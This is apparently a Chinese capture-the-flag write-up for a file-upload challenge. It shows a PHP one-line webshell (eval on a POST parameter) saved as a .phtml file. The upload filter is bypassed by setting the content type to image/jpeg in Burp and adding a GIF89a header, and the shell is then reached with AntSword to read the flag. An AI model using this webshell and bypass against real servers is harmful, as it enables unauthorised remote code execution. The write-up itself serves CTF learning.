访问之后是一个文件上传的页面,接着就可以想到上传一句话木马进行控制
创建文件1.phtml
,填写内容
<script language="php">eval($_POST['shell']);script>
接着上传,用bp抓包修改文件类型为image/jpeg
,上传失败,提示Do not lie me,怀疑是对图片内容有检测,因此在这之前再加上一部分
GIF89a
<script language="php">eval($_POST['shell']);script>
上传成功,接着猜测文件保存的位置,首先猜测路径为upload,那么打开蚁剑尝试一下,连接成功,在根目录下即可找到flag